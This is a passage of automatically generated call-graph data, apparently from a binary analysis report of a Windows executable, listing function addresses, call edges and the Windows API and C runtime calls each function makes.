17132->17133 17133->17128 17133->17132 17137 7ff6aae3f480 17134->17137 17135 7ff6aae3f4d3 17136 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17135->17136 17140 7ff6aae3f4fc 17136->17140 17137->17135 17138 7ff6aae3f526 17137->17138 17442 7ff6aae3f358 17138->17442 17140->16953 17450 7ff6aae2c850 17141->17450 17144 7ff6aae236eb GetLastError 17457 7ff6aae22c50 17144->17457 17145 7ff6aae23710 17452 7ff6aae29280 FindFirstFileExW 17145->17452 17149 7ff6aae23706 17153 7ff6aae2c550 _log10_special 8 API calls 17149->17153 17150 7ff6aae2377d 17483 7ff6aae29440 17150->17483 17151 7ff6aae23723 17472 7ff6aae29300 CreateFileW 17151->17472 17156 7ff6aae237b5 17153->17156 17156->16998 17163 7ff6aae21950 17156->17163 17157 7ff6aae2378b 17157->17149 17161 7ff6aae22810 49 API calls 17157->17161 17158 7ff6aae2374c __vcrt_InitializeCriticalSectionEx 17158->17150 17159 7ff6aae23734 17475 7ff6aae22810 17159->17475 17161->17149 17164 7ff6aae245c0 108 API calls 17163->17164 17165 7ff6aae21985 17164->17165 17166 7ff6aae21c43 17165->17166 17168 7ff6aae27f90 83 API calls 17165->17168 17167 7ff6aae2c550 _log10_special 8 API calls 17166->17167 17169 7ff6aae21c5e 17167->17169 17170 7ff6aae219cb 17168->17170 17169->16959 17169->16960 17212 7ff6aae21a03 17170->17212 17847 7ff6aae306d4 17170->17847 17172 7ff6aae3004c 74 API calls 17172->17166 17173 7ff6aae219e5 17174 7ff6aae219e9 17173->17174 17175 7ff6aae21a08 17173->17175 17177 7ff6aae34f08 memcpy_s 11 API calls 17174->17177 17851 7ff6aae3039c 17175->17851 17178 7ff6aae219ee 17177->17178 17854 7ff6aae22910 17178->17854 17181 7ff6aae21a26 17183 7ff6aae34f08 memcpy_s 11 API calls 17181->17183 17182 7ff6aae21a45 17186 7ff6aae21a7b 17182->17186 17187 7ff6aae21a5c 17182->17187 17184 7ff6aae21a2b 17183->17184 17185 7ff6aae22910 54 API calls 17184->17185 17185->17212 17188 7ff6aae21c80 49 API calls 17186->17188 17189 7ff6aae34f08 memcpy_s 11 API calls 17187->17189 17191 7ff6aae21a92 17188->17191 17190 7ff6aae21a61 17189->17190 17192 7ff6aae22910 54 API calls 17190->17192 17193 7ff6aae21c80 49 API calls 17191->17193 17192->17212 17194 7ff6aae21add 17193->17194 17195 7ff6aae306d4 73 API calls 17194->17195 17196 7ff6aae21b01 17195->17196 17197 7ff6aae21b16 17196->17197 17198 7ff6aae21b35 17196->17198 17200 7ff6aae34f08 memcpy_s 11 API calls 17197->17200 17199 7ff6aae3039c _fread_nolock 53 API calls 17198->17199 17201 7ff6aae21b4a 17199->17201 17202 7ff6aae21b1b 17200->17202 17203 7ff6aae21b6f 17201->17203 17204 7ff6aae21b50 17201->17204 17205 7ff6aae22910 54 API calls 17202->17205 17869 7ff6aae30110 17203->17869 17206 7ff6aae34f08 memcpy_s 11 API calls 17204->17206 17205->17212 17208 7ff6aae21b55 17206->17208 17210 7ff6aae22910 54 API calls 17208->17210 17210->17212 17211 7ff6aae22710 54 API calls 17211->17212 17212->17172 17214 7ff6aae2883a 17213->17214 17215 7ff6aae29390 2 API calls 17214->17215 17216 7ff6aae28859 GetEnvironmentVariableW 17215->17216 17217 7ff6aae28876 ExpandEnvironmentStringsW 17216->17217 17218 7ff6aae288c2 17216->17218 17217->17218 17219 7ff6aae28898 17217->17219 17220 7ff6aae2c550 _log10_special 8 API calls 17218->17220 17222 7ff6aae29440 2 API calls 17219->17222 17221 7ff6aae288d4 17220->17221 17221->16970 17223 7ff6aae288aa 17222->17223 17224 7ff6aae2c550 _log10_special 8 API calls 17223->17224 17225 7ff6aae288ba 17224->17225 17225->16970 17227 7ff6aae293b2 MultiByteToWideChar 17226->17227 17228 7ff6aae293d6 17226->17228 17227->17228 17229 7ff6aae293ec __vcrt_freefls 17227->17229 17228->17229 17230 7ff6aae293f3 MultiByteToWideChar 17228->17230 17229->17030 17230->17229 18087 7ff6aae26360 17231->18087 17235 7ff6aae23381 17239 7ff6aae23399 17235->17239 18155 7ff6aae26050 17235->18155 17237 7ff6aae2338d 17237->17239 17438 7ff6aae23670 17239->17438 17241 7ff6aae21ca5 17240->17241 17242 7ff6aae34984 49 API calls 17241->17242 17243 7ff6aae21cc8 17242->17243 17243->16964 17245 7ff6aae29390 2 API calls 17244->17245 17246 7ff6aae289b4 17245->17246 18456 7ff6aae38238 17246->18456 17248 7ff6aae289c6 __vcrt_freefls 17248->16977 17250 7ff6aae245cc 17249->17250 17251 7ff6aae29390 2 API calls 17250->17251 17252 7ff6aae245f4 17251->17252 17253 7ff6aae29390 2 API calls 17252->17253 17254 7ff6aae24607 17253->17254 18474 7ff6aae35f94 17254->18474 17257 7ff6aae2c550 _log10_special 8 API calls 17258 7ff6aae2392b 17257->17258 17258->16966 17259 7ff6aae27f90 17258->17259 17260 7ff6aae27fb4 17259->17260 17261 7ff6aae306d4 73 API calls 17260->17261 17266 7ff6aae2808b __vcrt_freefls 17260->17266 17262 7ff6aae27fd0 17261->17262 17262->17266 18866 7ff6aae378c8 17262->18866 17264 7ff6aae306d4 73 API calls 17267 7ff6aae27fe5 17264->17267 17265 7ff6aae3039c _fread_nolock 53 API calls 17265->17267 17266->16971 17267->17264 17267->17265 17267->17266 17269 7ff6aae3007c 17268->17269 18881 7ff6aae2fe28 17269->18881 17271 7ff6aae30095 17271->16966 17273 7ff6aae2c850 17272->17273 17274 7ff6aae22734 GetCurrentProcessId 17273->17274 17275 7ff6aae21c80 49 API calls 17274->17275 17276 7ff6aae22787 17275->17276 17277 7ff6aae34984 49 API calls 17276->17277 17278 7ff6aae227cf 17277->17278 17279 7ff6aae22620 12 API calls 17278->17279 17280 7ff6aae227f1 17279->17280 17281 7ff6aae2c550 _log10_special 8 API calls 17280->17281 17282 7ff6aae22801 17281->17282 17282->16998 17284 7ff6aae29390 2 API calls 17283->17284 17285 7ff6aae2895c 17284->17285 17286 7ff6aae29390 2 API calls 17285->17286 17287 7ff6aae2896c 17286->17287 17288 7ff6aae38238 38 API calls 17287->17288 17289 7ff6aae2897a __vcrt_freefls 17288->17289 17289->16981 17291 7ff6aae290f5 17290->17291 18892 7ff6aae28570 GetCurrentProcess OpenProcessToken 17291->18892 17294 7ff6aae28570 7 API calls 17295 7ff6aae29121 17294->17295 17296 7ff6aae2913a 17295->17296 17297 7ff6aae29154 17295->17297 17298 7ff6aae226b0 48 API calls 17296->17298 17299 7ff6aae226b0 48 API calls 17297->17299 17300 7ff6aae29152 17298->17300 17301 7ff6aae29167 LocalFree LocalFree 17299->17301 17300->17301 17302 7ff6aae29183 17301->17302 17305 7ff6aae2918f 17301->17305 18902 7ff6aae22b50 17302->18902 17304 7ff6aae2c550 _log10_special 8 API calls 17306 7ff6aae23c55 17304->17306 17305->17304 17306->17015 17306->17016 17308 7ff6aae28678 17307->17308 17309 7ff6aae286fa GetTempPathW GetCurrentProcessId 17308->17309 17311 7ff6aae28830 14 API calls 17308->17311 18943 7ff6aae225c0 17309->18943 17312 7ff6aae286a8 17311->17312 18911 7ff6aae281d0 17312->18911 17317 7ff6aae28728 __vcrt_freefls 17326 7ff6aae28765 __vcrt_freefls 17317->17326 18947 7ff6aae38b68 17317->18947 17319 7ff6aae38238 38 API calls 17323 7ff6aae286ce __vcrt_freefls 17319->17323 17322 7ff6aae2c550 _log10_special 8 API calls 17327 7ff6aae23cbb 17322->17327 17323->17309 17324 7ff6aae286dc 17323->17324 17328 7ff6aae22810 49 API calls 17324->17328 17329 7ff6aae29390 2 API calls 17326->17329 17337 7ff6aae286e8 __vcrt_freefls 17326->17337 17327->17026 17327->17027 17328->17337 17330 7ff6aae287b1 17329->17330 17331 7ff6aae287e9 17330->17331 17332 7ff6aae287b6 17330->17332 17333 7ff6aae38238 38 API calls 17331->17333 17334 7ff6aae29390 2 API calls 17332->17334 17333->17337 17335 7ff6aae287c6 17334->17335 17336 7ff6aae38238 38 API calls 17335->17336 17336->17337 17337->17322 17339 7ff6aae21c80 49 API calls 17338->17339 17340 7ff6aae244fd 17339->17340 17340->17010 17342 7ff6aae21c80 49 API calls 17341->17342 17343 7ff6aae24660 17342->17343 17343->17031 17345 7ff6aae26dd5 17344->17345 17346 7ff6aae23e64 17345->17346 17347 7ff6aae34f08 memcpy_s 11 API calls 17345->17347 17350 7ff6aae27340 17346->17350 17348 7ff6aae26de2 17347->17348 17349 7ff6aae22910 54 API calls 17348->17349 17349->17346 17351 7ff6aae21470 116 API calls 17350->17351 17352 7ff6aae27368 17351->17352 17353 7ff6aae24630 49 API calls 17352->17353 17363 7ff6aae274b9 __vcrt_freefls 17352->17363 17354 7ff6aae2738a 17353->17354 17355 7ff6aae2738f 17354->17355 17356 7ff6aae24630 49 API calls 17354->17356 17357 7ff6aae22a50 54 API calls 17355->17357 17358 7ff6aae273ae 17356->17358 17357->17363 17358->17355 17359 7ff6aae24630 49 API calls 17358->17359 17360 7ff6aae273ca 17359->17360 17360->17355 17361 7ff6aae273d3 17360->17361 17362 7ff6aae22710 54 API calls 17361->17362 17364 7ff6aae27443 memcpy_s __vcrt_freefls 17361->17364 17362->17363 17363->17065 17364->17065 17381 7ff6aae26e1c 17365->17381 17366 7ff6aae26f3f 17367 7ff6aae2c550 _log10_special 8 API calls 17366->17367 17368 7ff6aae26f51 17367->17368 17368->17068 17370 7ff6aae26faa 17372 7ff6aae22710 54 API calls 17370->17372 17371 7ff6aae21c80 49 API calls 17371->17381 17372->17366 17373 7ff6aae26f97 17375 7ff6aae22710 54 API calls 17373->17375 17374 7ff6aae24560 10 API calls 17374->17381 17375->17366 17377 7ff6aae22a50 54 API calls 17377->17381 17378 7ff6aae26f84 17379 7ff6aae22710 54 API calls 17378->17379 17379->17366 17381->17366 17381->17370 17381->17371 17381->17373 17381->17374 17381->17377 17381->17378 17382 7ff6aae26f6d 17381->17382 19089 7ff6aae21840 17381->19089 19093 7ff6aae27e20 17381->19093 19104 7ff6aae21600 17381->19104 17383 7ff6aae22710 54 API calls 17382->17383 17383->17366 17385 7ff6aae28e80 3 API calls 17384->17385 17386 7ff6aae271c9 17385->17386 17387 7ff6aae28e80 3 API calls 17386->17387 17388 7ff6aae271dc 17387->17388 17389 7ff6aae2720f 17388->17389 17390 7ff6aae271f4 17388->17390 17391 7ff6aae22710 54 API calls 17389->17391 19212 7ff6aae276c0 GetProcAddress 17390->19212 17393 7ff6aae23eaf 17391->17393 17393->17080 17394 7ff6aae274f0 17393->17394 17395 7ff6aae2750d 17394->17395 17396 7ff6aae27578 17395->17396 17397 7ff6aae22710 54 API calls 17395->17397 17396->17080 17398 7ff6aae27560 17397->17398 17399 7ff6aae26fc0 FreeLibrary 17398->17399 17399->17396 17401 7ff6aae2c850 17400->17401 17402 7ff6aae22a74 GetCurrentProcessId 17401->17402 17403 7ff6aae21c80 49 API calls 17402->17403 17404 7ff6aae22ac7 17403->17404 17405 7ff6aae34984 49 API calls 17404->17405 17406 7ff6aae22b0f 17405->17406 17407 7ff6aae22620 12 API calls 17406->17407 17408 7ff6aae22b31 17407->17408 17409 7ff6aae2c550 _log10_special 8 API calls 17408->17409 17410 7ff6aae22b41 17409->17410 17411 7ff6aae26fc0 17410->17411 17412 7ff6aae27116 17411->17412 17413 7ff6aae26fd2 17411->17413 17412->17079 17414 7ff6aae270ea 17413->17414 19282 7ff6aae28e60 FreeLibrary 17413->19282 17430 7ff6aae233ce memcpy_s 17418->17430 17419 7ff6aae2c550 _log10_special 8 API calls 17421 7ff6aae23664 17419->17421 17420 7ff6aae235c7 17420->17419 17421->16998 17421->17043 17423 7ff6aae21c80 49 API calls 17423->17430 17424 7ff6aae235e2 17426 7ff6aae22710 54 API calls 17424->17426 17425 7ff6aae24560 10 API calls 17425->17430 17426->17420 17427 7ff6aae27e20 52 API calls 17427->17430 17429 7ff6aae235c9 17432 7ff6aae22710 54 API calls 17429->17432 17430->17420 17430->17423 17430->17424 17430->17425 17430->17427 17430->17429 17431 7ff6aae22a50 54 API calls 17430->17431 17433 7ff6aae21600 118 API calls 17430->17433 17435 7ff6aae235d0 17430->17435 19284 7ff6aae27120 17430->19284 19288 7ff6aae24190 17430->19288 19332 7ff6aae24450 17430->19332 17431->17430 17432->17420 17433->17430 17436 7ff6aae22710 54 API calls 17435->17436 17436->17420 17439 7ff6aae2367e 17438->17439 17440 7ff6aae2368f 17439->17440 19394 7ff6aae28e60 FreeLibrary 17439->19394 17440->17057 17449 7ff6aae3546c EnterCriticalSection 17442->17449 17451 7ff6aae236bc GetModuleFileNameW 17450->17451 17451->17144 17451->17145 17453 7ff6aae292d2 17452->17453 17454 7ff6aae292bf FindClose 17452->17454 17455 7ff6aae2c550 _log10_special 8 API calls 17453->17455 17454->17453 17456 7ff6aae2371a 17455->17456 17456->17150 17456->17151 17458 7ff6aae2c850 17457->17458 17459 7ff6aae22c70 GetCurrentProcessId 17458->17459 17488 7ff6aae226b0 17459->17488 17461 7ff6aae22cb9 17492 7ff6aae34bd8 17461->17492 17464 7ff6aae226b0 48 API calls 17465 7ff6aae22d34 FormatMessageW 17464->17465 17467 7ff6aae22d6d 17465->17467 17468 7ff6aae22d7f MessageBoxW 17465->17468 17469 7ff6aae226b0 48 API calls 17467->17469 17470 7ff6aae2c550 _log10_special 8 API calls 17468->17470 17469->17468 17471 7ff6aae22daf 17470->17471 17471->17149 17473 7ff6aae23730 17472->17473 17474 7ff6aae29340 GetFinalPathNameByHandleW CloseHandle 17472->17474 17473->17158 17473->17159 17474->17473 17476 7ff6aae22834 17475->17476 17477 7ff6aae226b0 48 API calls 17476->17477 17478 7ff6aae22887 17477->17478 17479 7ff6aae34bd8 48 API calls 17478->17479 17480 7ff6aae228d0 MessageBoxW 17479->17480 17481 7ff6aae2c550 _log10_special 8 API calls 17480->17481 17482 7ff6aae22900 17481->17482 17482->17149 17484 7ff6aae2946a WideCharToMultiByte 17483->17484 17485 7ff6aae29495 17483->17485 17484->17485 17487 7ff6aae294ab __vcrt_freefls 17484->17487 17486 7ff6aae294b2 WideCharToMultiByte 17485->17486 17485->17487 17486->17487 17487->17157 17489 7ff6aae226d5 17488->17489 17490 7ff6aae34bd8 48 API calls 17489->17490 17491 7ff6aae226f8 17490->17491 17491->17461 17495 7ff6aae34c32 17492->17495 17493 7ff6aae34c57 17494 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17493->17494 17498 7ff6aae34c81 17494->17498 17495->17493 17496 7ff6aae34c93 17495->17496 17510 7ff6aae32f90 17496->17510 17501 7ff6aae2c550 _log10_special 8 API calls 17498->17501 17499 7ff6aae34d74 17500 7ff6aae3a948 __free_lconv_num 11 API calls 17499->17500 17500->17498 17503 7ff6aae22d04 17501->17503 17503->17464 17504 7ff6aae34d49 17508 7ff6aae3a948 __free_lconv_num 11 API calls 17504->17508 17505 7ff6aae34d9a 17505->17499 17507 7ff6aae34da4 17505->17507 17506 7ff6aae34d40 17506->17499 17506->17504 17509 7ff6aae3a948 __free_lconv_num 11 API calls 17507->17509 17508->17498 17509->17498 17511 7ff6aae32fce 17510->17511 17512 7ff6aae32fbe 17510->17512 17513 7ff6aae32fd7 17511->17513 17518 7ff6aae33005 17511->17518 17514 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17512->17514 17515 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17513->17515 17516 7ff6aae32ffd 17514->17516 17515->17516 17516->17499 17516->17504 17516->17505 17516->17506 17518->17512 17518->17516 17521 7ff6aae339a4 17518->17521 17554 7ff6aae333f0 17518->17554 17591 7ff6aae32b80 17518->17591 17522 7ff6aae339e6 17521->17522 17523 7ff6aae33a57 17521->17523 17526 7ff6aae339ec 17522->17526 17527 7ff6aae33a81 17522->17527 17524 7ff6aae33a5c 17523->17524 17525 7ff6aae33ab0 17523->17525 17530 7ff6aae33a91 17524->17530 17531 7ff6aae33a5e 17524->17531 17532 7ff6aae33ac7 17525->17532 17534 7ff6aae33aba 17525->17534 17539 7ff6aae33abf 17525->17539 17528 7ff6aae33a20 17526->17528 17529 7ff6aae339f1 17526->17529 17614 7ff6aae31d54 17527->17614 17535 7ff6aae339f7 17528->17535 17528->17539 17529->17532 17529->17535 17621 7ff6aae31944 17530->17621 17533 7ff6aae33a00 17531->17533 17543 7ff6aae33a6d 17531->17543 17628 7ff6aae346ac 17532->17628 17552 7ff6aae33af0 17533->17552 17594 7ff6aae34158 17533->17594 17534->17527 17534->17539 17535->17533 17542 7ff6aae33a32 17535->17542 17550 7ff6aae33a1b 17535->17550 17539->17552 17632 7ff6aae32164 17539->17632 17542->17552 17604 7ff6aae34494 17542->17604 17543->17527 17544 7ff6aae33a72 17543->17544 17544->17552 17610 7ff6aae34558 17544->17610 17546 7ff6aae2c550 _log10_special 8 API calls 17547 7ff6aae33dea 17546->17547 17547->17518 17550->17552 17553 7ff6aae33cdc 17550->17553 17639 7ff6aae347c0 17550->17639 17552->17546 17553->17552 17645 7ff6aae3ea08 17553->17645 17555 7ff6aae333fe 17554->17555 17556 7ff6aae33414 17554->17556 17558 7ff6aae339e6 17555->17558 17559 7ff6aae33a57 17555->17559 17560 7ff6aae33454 17555->17560 17557 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17556->17557 17556->17560 17557->17560 17563 7ff6aae339ec 17558->17563 17564 7ff6aae33a81 17558->17564 17561 7ff6aae33a5c 17559->17561 17562 7ff6aae33ab0 17559->17562 17560->17518 17567 7ff6aae33a91 17561->17567 17568 7ff6aae33a5e 17561->17568 17569 7ff6aae33ac7 17562->17569 17571 7ff6aae33aba 17562->17571 17576 7ff6aae33abf 17562->17576 17565 7ff6aae33a20 17563->17565 17566 7ff6aae339f1 17563->17566 17573 7ff6aae31d54 38 API calls 17564->17573 17572 7ff6aae339f7 17565->17572 17565->17576 17566->17569 17566->17572 17574 7ff6aae31944 38 API calls 17567->17574 17570 7ff6aae33a00 17568->17570 17580 7ff6aae33a6d 17568->17580 17577 7ff6aae346ac 45 API calls 17569->17577 17575 7ff6aae34158 47 API calls 17570->17575 17590 7ff6aae33af0 17570->17590 17571->17564 17571->17576 17572->17570 17578 7ff6aae33a32 17572->17578 17587 7ff6aae33a1b 17572->17587 17573->17587 17574->17587 17575->17587 17579 7ff6aae32164 38 API calls 17576->17579 17576->17590 17577->17587 17581 7ff6aae34494 46 API calls 17578->17581 17578->17590 17579->17587 17580->17564 17582 7ff6aae33a72 17580->17582 17581->17587 17585 7ff6aae34558 37 API calls 17582->17585 17582->17590 17583 7ff6aae2c550 _log10_special 8 API calls 17584 7ff6aae33dea 17583->17584 17584->17518 17585->17587 17586 7ff6aae347c0 45 API calls 17589 7ff6aae33cdc 17586->17589 17587->17586 17587->17589 17587->17590 17588 7ff6aae3ea08 46 API calls 17588->17589 17589->17588 17589->17590 17590->17583 17830 7ff6aae30fc8 17591->17830 17595 7ff6aae3417e 17594->17595 17657 7ff6aae30b80 17595->17657 17600 7ff6aae347c0 45 API calls 17602 7ff6aae342c3 17600->17602 17601 7ff6aae347c0 45 API calls 17603 7ff6aae34351 17601->17603 17602->17601 17602->17602 17602->17603 17603->17550 17606 7ff6aae344c9 17604->17606 17605 7ff6aae3450e 17605->17550 17606->17605 17607 7ff6aae344e7 17606->17607 17608 7ff6aae347c0 45 API calls 17606->17608 17609 7ff6aae3ea08 46 API calls 17607->17609 17608->17607 17609->17605 17612 7ff6aae34579 17610->17612 17611 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17613 7ff6aae345aa 17611->17613 17612->17611 17612->17613 17613->17550 17615 7ff6aae31d87 17614->17615 17616 7ff6aae31db6 17615->17616 17618 7ff6aae31e73 17615->17618 17620 7ff6aae31df3 17616->17620 17800 7ff6aae30c28 17616->17800 17619 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17618->17619 17619->17620 17620->17550 17622 7ff6aae31977 17621->17622 17623 7ff6aae319a6 17622->17623 17625 7ff6aae31a63 17622->17625 17624 7ff6aae30c28 12 API calls 17623->17624 17627 7ff6aae319e3 17623->17627 17624->17627 17626 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17625->17626 17626->17627 17627->17550 17629 7ff6aae346ef 17628->17629 17631 7ff6aae346f3 __crtLCMapStringW 17629->17631 17808 7ff6aae34748 17629->17808 17631->17550 17633 7ff6aae32197 17632->17633 17634 7ff6aae321c6 17633->17634 17636 7ff6aae32283 17633->17636 17635 7ff6aae30c28 12 API calls 17634->17635 17638 7ff6aae32203 17634->17638 17635->17638 17637 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17636->17637 17637->17638 17638->17550 17640 7ff6aae347d7 17639->17640 17812 7ff6aae3d9b8 17640->17812 17647 7ff6aae3ea39 17645->17647 17654 7ff6aae3ea47 17645->17654 17646 7ff6aae3ea67 17649 7ff6aae3ea78 17646->17649 17650 7ff6aae3ea9f 17646->17650 17647->17646 17648 7ff6aae347c0 45 API calls 17647->17648 17647->17654 17648->17646 17820 7ff6aae400a0 17649->17820 17652 7ff6aae3eac9 17650->17652 17653 7ff6aae3eb2a 17650->17653 17650->17654 17652->17654 17823 7ff6aae3f8a0 17652->17823 17655 7ff6aae3f8a0 _fread_nolock MultiByteToWideChar 17653->17655 17654->17553 17655->17654 17658 7ff6aae30bb7 17657->17658 17664 7ff6aae30ba6 17657->17664 17658->17664 17687 7ff6aae3d5fc 17658->17687 17661 7ff6aae30bf8 17663 7ff6aae3a948 __free_lconv_num 11 API calls 17661->17663 17662 7ff6aae3a948 __free_lconv_num 11 API calls 17662->17661 17663->17664 17665 7ff6aae3e570 17664->17665 17666 7ff6aae3e58d 17665->17666 17667 7ff6aae3e5c0 17665->17667 17668 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17666->17668 17667->17666 17670 7ff6aae3e5f2 17667->17670 17669 7ff6aae342a1 17668->17669 17669->17600 17669->17602 17675 7ff6aae3e705 17670->17675 17681 7ff6aae3e63a 17670->17681 17671 7ff6aae3e7f7 17727 7ff6aae3da5c 17671->17727 17673 7ff6aae3e7bd 17720 7ff6aae3ddf4 17673->17720 17675->17671 17675->17673 17676 7ff6aae3e78c 17675->17676 17678 7ff6aae3e74f 17675->17678 17680 7ff6aae3e745 17675->17680 17713 7ff6aae3e0d4 17676->17713 17703 7ff6aae3e304 17678->17703 17680->17673 17682 7ff6aae3e74a 17680->17682 17681->17669 17694 7ff6aae3a4a4 17681->17694 17682->17676 17682->17678 17685 7ff6aae3a900 _isindst 17 API calls 17686 7ff6aae3e854 17685->17686 17688 7ff6aae3d647 17687->17688 17692 7ff6aae3d60b memcpy_s 17687->17692 17690 7ff6aae34f08 memcpy_s 11 API calls 17688->17690 17689 7ff6aae3d62e HeapAlloc 17691 7ff6aae30be4 17689->17691 17689->17692 17690->17691 17691->17661 17691->17662 17692->17688 17692->17689 17693 7ff6aae43590 memcpy_s 2 API calls 17692->17693 17693->17692 17695 7ff6aae3a4bb 17694->17695 17696 7ff6aae3a4b1 17694->17696 17697 7ff6aae34f08 memcpy_s 11 API calls 17695->17697 17696->17695 17698 7ff6aae3a4d6 17696->17698 17702 7ff6aae3a4c2 17697->17702 17699 7ff6aae3a4ce 17698->17699 17701 7ff6aae34f08 memcpy_s 11 API calls 17698->17701 17699->17669 17699->17685 17700 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17700->17699 17701->17702 17702->17700 17736 7ff6aae440ac 17703->17736 17707 7ff6aae3e3ac 17708 7ff6aae3e401 17707->17708 17710 7ff6aae3e3cc 17707->17710 17712 7ff6aae3e3b0 17707->17712 17789 7ff6aae3def0 17708->17789 17785 7ff6aae3e1ac 17710->17785 17712->17669 17714 7ff6aae440ac 38 API calls 17713->17714 17715 7ff6aae3e11e 17714->17715 17716 7ff6aae43af4 37 API calls 17715->17716 17717 7ff6aae3e16e 17716->17717 17718 7ff6aae3e172 17717->17718 17719 7ff6aae3e1ac 45 API calls 17717->17719 17718->17669 17719->17718 17721 7ff6aae440ac 38 API calls 17720->17721 17722 7ff6aae3de3f 17721->17722 17723 7ff6aae43af4 37 API calls 17722->17723 17724 7ff6aae3de97 17723->17724 17725 7ff6aae3de9b 17724->17725 17726 7ff6aae3def0 45 API calls 17724->17726 17725->17669 17726->17725 17728 7ff6aae3daa1 17727->17728 17729 7ff6aae3dad4 17727->17729 17730 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17728->17730 17731 7ff6aae3db6d 17729->17731 17732 7ff6aae3daec 17729->17732 17733 7ff6aae3dacd memcpy_s 17730->17733 17731->17733 17735 7ff6aae347c0 45 API calls 17731->17735 17734 7ff6aae3ddf4 46 API calls 17732->17734 17733->17669 17734->17733 17735->17733 17737 7ff6aae440ff fegetenv 17736->17737 17738 7ff6aae47e2c 37 API calls 17737->17738 17742 7ff6aae44152 17738->17742 17739 7ff6aae44242 17741 7ff6aae47e2c 37 API calls 17739->17741 17740 7ff6aae4417f 17744 7ff6aae3a4a4 __std_exception_copy 37 API calls 17740->17744 17743 7ff6aae4426c 17741->17743 17742->17739 17745 7ff6aae4416d 17742->17745 17746 7ff6aae4421c 17742->17746 17747 7ff6aae47e2c 37 API calls 17743->17747 17748 7ff6aae441fd 17744->17748 17745->17739 17745->17740 17750 7ff6aae3a4a4 __std_exception_copy 37 API calls 17746->17750 17751 7ff6aae4427d 17747->17751 17749 7ff6aae45324 17748->17749 17756 7ff6aae44205 17748->17756 17752 7ff6aae3a900 _isindst 17 API calls 17749->17752 17750->17748 17753 7ff6aae48020 20 API calls 17751->17753 17754 7ff6aae45339 17752->17754 17762 7ff6aae442e6 memcpy_s 17753->17762 17755 7ff6aae2c550 _log10_special 8 API calls 17757 7ff6aae3e351 17755->17757 17756->17755 17781 7ff6aae43af4 17757->17781 17758 7ff6aae4468f memcpy_s 17759 7ff6aae44327 memcpy_s 17778 7ff6aae44c6b memcpy_s 17759->17778 17780 7ff6aae44783 memcpy_s 17759->17780 17760 7ff6aae43c10 37 API calls 17767 7ff6aae450e7 17760->17767 17761 7ff6aae4497b 17761->17761 17763 7ff6aae449cf 17761->17763 17764 7ff6aae4533c memcpy_s 37 API calls 17761->17764 17762->17758 17762->17759 17765 7ff6aae34f08 memcpy_s 11 API calls 17762->17765 17763->17760 17764->17763 17766 7ff6aae44760 17765->17766 17768 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17766->17768 17770 7ff6aae4533c memcpy_s 37 API calls 17767->17770 17777 7ff6aae45142 17767->17777 17768->17759 17769 7ff6aae452c8 17772 7ff6aae47e2c 37 API calls 17769->17772 17770->17777 17771 7ff6aae34f08 11 API calls memcpy_s 17771->17778 17772->17756 17773 7ff6aae34f08 11 API calls memcpy_s 17773->17780 17774 7ff6aae43c10 37 API calls 17774->17777 17775 7ff6aae3a8e0 37 API calls _invalid_parameter_noinfo 17775->17780 17776 7ff6aae4533c memcpy_s 37 API calls 17776->17777 17777->17769 17777->17774 17777->17776 17778->17761 17778->17763 17778->17771 17779 7ff6aae3a8e0 37 API calls _invalid_parameter_noinfo 17778->17779 17779->17778 17780->17761 17780->17773 17780->17775 17782 7ff6aae43b13 17781->17782 17783 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17782->17783 17784 7ff6aae43b3e memcpy_s 17782->17784 17783->17784 17784->17707 17786 7ff6aae3e1d8 memcpy_s 17785->17786 17787 7ff6aae347c0 45 API calls 17786->17787 17788 7ff6aae3e292 memcpy_s 17786->17788 17787->17788 17788->17712 17790 7ff6aae3df78 memcpy_s 17789->17790 17791 7ff6aae3df2b 17789->17791 17794 7ff6aae3dfe3 17790->17794 17796 7ff6aae347c0 45 API calls 17790->17796 17792 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17791->17792 17793 7ff6aae3df57 17792->17793 17793->17712 17795 7ff6aae3a4a4 __std_exception_copy 37 API calls 17794->17795 17799 7ff6aae3e025 memcpy_s 17795->17799 17796->17794 17797 7ff6aae3a900 _isindst 17 API calls 17798 7ff6aae3e0d0 17797->17798 17799->17797 17801 7ff6aae30c4e 17800->17801 17802 7ff6aae30c5f 17800->17802 17801->17620 17802->17801 17803 7ff6aae3d5fc _fread_nolock 12 API calls 17802->17803 17804 7ff6aae30c90 17803->17804 17805 7ff6aae30ca4 17804->17805 17806 7ff6aae3a948 __free_lconv_num 11 API calls 17804->17806 17807 7ff6aae3a948 __free_lconv_num 11 API calls 17805->17807 17806->17805 17807->17801 17809 7ff6aae34766 17808->17809 17810 7ff6aae3476e 17808->17810 17811 7ff6aae347c0 45 API calls 17809->17811 17810->17631 17811->17810 17813 7ff6aae347ff 17812->17813 17814 7ff6aae3d9d1 17812->17814 17816 7ff6aae3da24 17813->17816 17814->17813 17815 7ff6aae43304 45 API calls 17814->17815 17815->17813 17817 7ff6aae3da3d 17816->17817 17819 7ff6aae3480f 17816->17819 17818 7ff6aae42650 45 API calls 17817->17818 17817->17819 17818->17819 17819->17553 17826 7ff6aae46d88 17820->17826 17825 7ff6aae3f8a9 MultiByteToWideChar 17823->17825 17829 7ff6aae46dec 17826->17829 17827 7ff6aae2c550 _log10_special 8 API calls 17828 7ff6aae400bd 17827->17828 17828->17654 17829->17827 17831 7ff6aae30ffd 17830->17831 17832 7ff6aae3100f 17830->17832 17833 7ff6aae34f08 memcpy_s 11 API calls 17831->17833 17834 7ff6aae31059 17832->17834 17836 7ff6aae3101d 17832->17836 17835 7ff6aae31002 17833->17835 17839 7ff6aae313d5 17834->17839 17841 7ff6aae34f08 memcpy_s 11 API calls 17834->17841 17837 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17835->17837 17838 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17836->17838 17844 7ff6aae3100d 17837->17844 